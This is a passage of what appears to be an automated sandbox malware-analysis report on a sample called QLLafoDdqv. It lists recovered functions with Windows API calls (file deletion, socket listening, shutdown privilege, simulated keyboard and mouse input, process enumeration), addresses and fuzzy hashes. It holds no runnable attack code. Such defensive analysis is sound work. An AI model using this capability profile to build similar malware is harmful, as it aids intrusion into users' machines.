              • Instruction Fuzzy Hash: B731F9725402196EDF11EFB4DC09AEF77ACAF09320F148156FA56E2190EB78DE448B14
              APIs
              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 007497BE
              • FindNextFileW.KERNEL32(00000000,?), ref: 00749819
              • FindClose.KERNEL32(00000000), ref: 00749824
              • FindFirstFileW.KERNEL32(*.*,?), ref: 00749840
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00749890
              • SetCurrentDirectoryW.KERNEL32(00796B7C), ref: 007498AE
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007498B8
              • FindClose.KERNEL32(00000000), ref: 007498C5
              • FindClose.KERNEL32(00000000), ref: 007498D5
                • Part of subcall function 0073DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0073DB00
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
              • String ID: *.*
              • API String ID: 2640511053-438819550
              • Opcode ID: c780874a21ad45ac86f7947febb4d53a835f8b8b8cef2efe8260e8610610cd08
              • Instruction ID: c049285ddb61d30c35fcd9dfff684781a7d875f4b443f07a49a77d302ff12b77
              • Instruction Fuzzy Hash: C931E4715003196EEF11EFB8EC49AEF77ACAF06320F148256FA51A2191DB78DE44CB24
              APIs
              • GetLocalTime.KERNEL32(?), ref: 00748257
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00748267
              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00748273
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00748310
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00748324
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00748356
              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0074838C
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00748395
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CurrentDirectoryTime$File$Local$System
              • String ID: *.*
              • API String ID: 1464919966-438819550
              • Opcode ID: 0c3c1c8d972425a22753478f90c2e5629657babe5ecc5d1133feb463515690b3
              • Instruction ID: b7adcd07df4f8150e2f4655e967cec24d17107c75c5b6f2a12519b71cc609257
              • Instruction Fuzzy Hash: 5A616A725043099FCB50EF64D8449AEB3E9FF89310F04891EF989C7251EB39E945CB96
              APIs
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
                • Part of subcall function 0073E199: GetFileAttributesW.KERNEL32(?,0073CF95), ref: 0073E19A
              • FindFirstFileW.KERNEL32(?,?), ref: 0073D122
              • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0073D1DD
              • MoveFileW.KERNEL32(?,?), ref: 0073D1F0
              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0073D20D
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0073D237
                • Part of subcall function 0073D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0073D21C,?,?), ref: 0073D2B2
              • FindClose.KERNEL32(00000000,?,?,?), ref: 0073D253
              • FindClose.KERNEL32(00000000), ref: 0073D264
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
              • String ID: \*.*
              • API String ID: 1946585618-1173974218
              • Opcode ID: 8d8350918ee7d2835e02ad51641f89498d10bb290706d340d4796fa6929d2817
              • Instruction ID: bce085d378b6d754e39ed4505b7288ef27929317601873dc31b4c67e6b6eb938
              • Instruction Fuzzy Hash: 75618D31D0110D9FDF15EBE0EA929EEB776AF15300F24416AE40277292EB345F09DB65
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
              • String ID:
              • API String ID: 1737998785-0
              • Opcode ID: d7bc9851155d743fe890564f93417b07b91641f4f64ea739b960c5818ef115ae
              • Instruction ID: 76fd42fe24232da41f34ba76e19fb0f16b4ea39360d2add1a9b01192d92906c7
              • Instruction Fuzzy Hash: 1C417935604611AFE721DF15D888F2ABBA5FF44328F14C099E8568B662C779EC42CB98
              APIs
                • Part of subcall function 007316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0073170D
                • Part of subcall function 007316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0073173A
                • Part of subcall function 007316C3: GetLastError.KERNEL32 ref: 0073174A
              • ExitWindowsEx.USER32(?,00000000), ref: 0073E932
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
              • String ID: $ $@$SeShutdownPrivilege
              • API String ID: 2234035333-3163812486
              • Opcode ID: 29605785c4c4f674a4c988537f27825083788cba4fe7177f13e150eb66884608
              • Instruction ID: 7644832773076d6076f8b54017c6d6cdc5ef9e16c7ca41c84611a131e81c1e17
              • Instruction Fuzzy Hash: 4B01D672610315EBFB5466B49C8ABBB725CA714750F154522FC03E21D3D5AD6C408395
              APIs
              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00751276
              • WSAGetLastError.WSOCK32 ref: 00751283
              • bind.WSOCK32(00000000,?,00000010), ref: 007512BA
              • WSAGetLastError.WSOCK32 ref: 007512C5
              • closesocket.WSOCK32(00000000), ref: 007512F4
              • listen.WSOCK32(00000000,00000005), ref: 00751303
              • WSAGetLastError.WSOCK32 ref: 0075130D
              • closesocket.WSOCK32(00000000), ref: 0075133C
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$closesocket$bindlistensocket
              • String ID:
              • API String ID: 540024437-0
              • Opcode ID: e11f8cacd6958e878d31d180a7fc7d56a5fac0d13bd429cabf37b67a729695c9
              • Instruction ID: 4a023fd7b94370d9522c3e88ee3e41cf9f48f41cd75a973526b27d2c490e090f
              • Instruction Fuzzy Hash: B6419331A002019FD710DF24C498B69BBE6BF86319F588199D8568F396C7B9EC85CBE1
              APIs
              • _free.LIBCMT ref: 0070B9D4
              • _free.LIBCMT ref: 0070B9F8
              • _free.LIBCMT ref: 0070BB7F
              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00773700), ref: 0070BB91
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0070BC09
              • WideCharToMultiByte.KERNEL32(00000000,00000000,007A1270,000000FF,?,0000003F,00000000,?), ref: 0070BC36
              • _free.LIBCMT ref: 0070BD4B
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ByteCharMultiWide$InformationTimeZone
              • String ID:
              • API String ID: 314583886-0
              • Opcode ID: ff62f05893bd03654710251118826394acccf7fcb898ef9175009f9c40334fa1
              • Instruction ID: 8b73b1cf3add4b2e3befb79fdd0ba1a848c2488a021a9335b104180babde4212
              • Instruction Fuzzy Hash: A6C118B1A04205DFDB20DF688C45BAABBE9EF82310F64839AE594D72D1D7389F418754
              APIs
                • Part of subcall function 006D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006D3A97,?,?,006D2E7F,?,?,?,00000000), ref: 006D3AC2
                • Part of subcall function 0073E199: GetFileAttributesW.KERNEL32(?,0073CF95), ref: 0073E19A
              • FindFirstFileW.KERNEL32(?,?), ref: 0073D420
              • DeleteFileW.KERNEL32(?,?,?,?), ref: 0073D470
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0073D481
              • FindClose.KERNEL32(00000000), ref: 0073D498
              • FindClose.KERNEL32(00000000), ref: 0073D4A1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
              • String ID: \*.*
              • API String ID: 2649000838-1173974218
              • Opcode ID: d0d186c2cc7bbfd8b449b01c630ffdaa9258bd91fc18ec41823ea8d55f5985ad
              • Instruction ID: eac0b61cea7083ceae01ddbda10383e577232688b13f8a8e79fb91f9164828a7
              • Instruction Fuzzy Hash: 793190314083819FD315EF60D8918AFB7A9BE91300F444A1EF8D152292EB34AE09C7A7
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 4e7c5b1c64c152118a28c5fc1936f06ccb31f59c6b77d74653aaee0572b1885b
              • Instruction ID: fc4c059e3dd3992df76e8b32b6770aea6016ab072556c73e08d9e955c1b7d637
              • Opcode Fuzzy Hash: 4e7c5b1c64c152118a28c5fc1936f06ccb31f59c6b77d74653aaee0572b1885b
              • Instruction Fuzzy Hash: C1C22971E04628CFDB65CE289D407EAB7F5EB44314F1446EAD84DE7281E778AE818F40
              APIs
              • _wcslen.LIBCMT ref: 007464DC
              • CoInitialize.OLE32(00000000), ref: 00746639
              • CoCreateInstance.OLE32(0076FCF8,00000000,00000001,0076FB68,?), ref: 00746650
              • CoUninitialize.OLE32 ref: 007468D4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateInitializeInstanceUninitialize_wcslen
              • String ID: .lnk
              • API String ID: 886957087-24824748
              • Opcode ID: 23728add326f4e8799e038a8273b90ec5e76e3cf346854aa68f885b76ec5ca21
              • Instruction ID: cb9ef2f34f99fcac94052ca47b1de849c821af0f6a8f52df6ca59be83f865122
              • Opcode Fuzzy Hash: 23728add326f4e8799e038a8273b90ec5e76e3cf346854aa68f885b76ec5ca21
              • Instruction Fuzzy Hash: 80D12871908301AFC354EF24C88196BB7E9FF95704F40496DF5958B2A1EB71ED05CBA2
              APIs
              • GetForegroundWindow.USER32(?,?,00000000), ref: 007522E8
                • Part of subcall function 0074E4EC: GetWindowRect.USER32(?,?), ref: 0074E504
              • GetDesktopWindow.USER32 ref: 00752312
              • GetWindowRect.USER32(00000000), ref: 00752319
              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00752355
              • GetCursorPos.USER32(?), ref: 00752381
              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007523DF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$Rectmouse_event$CursorDesktopForeground
              • String ID:
              • API String ID: 2387181109-0
              • Opcode ID: 765aaeedce4ff849935b1ed7c3d945a0398f145955c4d746b5e8d2adc2ed0767
              • Instruction ID: ada55b00d8781adb8c5756bfe7e74830e864a914e828ce3784f89565fd000adf
              • Opcode Fuzzy Hash: 765aaeedce4ff849935b1ed7c3d945a0398f145955c4d746b5e8d2adc2ed0767
              • Instruction Fuzzy Hash: 1F310072104345AFD720DF54CC48BABBBA9FF85310F000919F98697182DBB8EA09CB96
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00749B78
              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00749C8B
                • Part of subcall function 00743874: GetInputState.USER32 ref: 007438CB
                • Part of subcall function 00743874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00743966
              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00749BA8
              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00749C75
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
              • String ID: *.*
              • API String ID: 1972594611-438819550
              • Opcode ID: 8dd11add7149dc5ab0d17a56fc657661ed4d19806dc38841bde0c914caba73a3
              • Instruction ID: 182ebe23035464f94f5a1a4284ce08357c866eb50e0760f73a40d2cca932f5be
              • Opcode Fuzzy Hash: 8dd11add7149dc5ab0d17a56fc657661ed4d19806dc38841bde0c914caba73a3
              • Instruction Fuzzy Hash: 6C419071D0020A9FCF55DFB4C989AEEBBB9EF05300F24415AE905A2291EB349E84CF64
              APIs
                • Part of subcall function 006E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006E9BB2
              • DefDlgProcW.USER32(?,?,?,?,?), ref: 006E9A4E
              • GetSysColor.USER32(0000000F), ref: 006E9B23
              • SetBkColor.GDI32(?,00000000), ref: 006E9B36
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Color$LongProcWindow
              • String ID:
              • API String ID: 3131106179-0
              • Opcode ID: 71d67bfb49a92f646ffba73c8a7da5ac1453249e6257f14826549e441ab62c2c
              • Instruction ID: 28c86317299bfd33e0a8eb43354ab93956642fb2f3a4ce3490b17ac741a9cfeb
              • Opcode Fuzzy Hash: 71d67bfb49a92f646ffba73c8a7da5ac1453249e6257f14826549e441ab62c2c
              • Instruction Fuzzy Hash: 08A1397010A7A0FEE72D9A2E9D59DBB365FDF82304F144229F902C6791CA2D9D02C676
              APIs
                • Part of subcall function 0075304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0075307A
                • Part of subcall function 0075304E: _wcslen.LIBCMT ref: 0075309B
              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0075185D
              • WSAGetLastError.WSOCK32 ref: 00751884
              • bind.WSOCK32(00000000,?,00000010), ref: 007518DB
              • WSAGetLastError.WSOCK32 ref: 007518E6
              • closesocket.WSOCK32(00000000), ref: 00751915
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
              • String ID:
              • API String ID: 1601658205-0
              • Opcode ID: 9a6f4fb0ee30d4bc216c5916cd5c2d1326cffc5da6c57927f665e5180eaf2df7
              • Instruction ID: c407075c5f2950f4b479861e2bb77e6603acefab2388f9c2327bb913dbe9ed29
              • Opcode Fuzzy Hash: 9a6f4fb0ee30d4bc216c5916cd5c2d1326cffc5da6c57927f665e5180eaf2df7
              • Instruction Fuzzy Hash: 5551D471A002009FE720AF24C886F6A77E69B44718F54805DF9469F3C3C7B5AD41CBE5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
              • API String ID: 0-1546025612
              • Opcode ID: ba38798e410491dae5b845a6c3c9afdf7cdbd403ea7af68e1c94db77ac390410
              • Instruction ID: efcc6938f8e35a1f35dbea4f23efc3e309a218667f0b2e7dc190ecb63132d0b8
              • Opcode Fuzzy Hash: ba38798e410491dae5b845a6c3c9afdf7cdbd403ea7af68e1c94db77ac390410
              • Instruction Fuzzy Hash: 1CA23C71E0061ACFDF24CF58C8447EDB7B2BB54314F2481AAE855A7385EB789D81CB90
              APIs
              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007382AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: lstrlen
              • String ID: ($tby$|
              • API String ID: 1659193697-2466584908
              • Opcode ID: 05bb3cf3550f4db3ce7c9236ef3b47d4786403cec89c112738ecf8b4305d2f4b
              • Instruction ID: ba284e5c921038b52b2eb15278b4e4f79bf28b77b3e0acc91572e785a4e4fe4e
              • Opcode Fuzzy Hash: 05bb3cf3550f4db3ce7c9236ef3b47d4786403cec89c112738ecf8b4305d2f4b
              • Instruction Fuzzy Hash: B2323574A00705DFDB68CF59C081A6AB7F1FF48710B15856EE49ADB3A2EB74E941CB40
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 0075A6AC
              • Process32FirstW.KERNEL32(00000000,?), ref: 0075A6BA
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • Process32NextW.KERNEL32(00000000,?), ref: 0075A79C
              • CloseHandle.KERNEL32(00000000), ref: 0075A7AB
                • Part of subcall function 006ECE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00713303,?), ref: 006ECE8A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
              • String ID:
              • API String ID: 1991900642-0
              • Opcode ID: 16855abe89def3deff3a485a1ad00df973d8f0baafa1d38b517cee9a0610b007
              • Instruction ID: 7846b0c523e5dbecaee7f45f4c12ba40fca8bb249599fd89b8535eaecb573475
              • Opcode Fuzzy Hash: 16855abe89def3deff3a485a1ad00df973d8f0baafa1d38b517cee9a0610b007
              • Instruction Fuzzy Hash: 28518F71908300AFD750DF24C885A6BBBE9FF89754F00892EF98597351EB74D904CB96
              APIs
              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0073AAAC
              • SetKeyboardState.USER32(00000080), ref: 0073AAC8
              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0073AB36
              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0073AB88
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: 4bd650200eb1c085d6d9ef9c9f27ca8063e517b6d0ee1f2c7e1094429be5ee9a
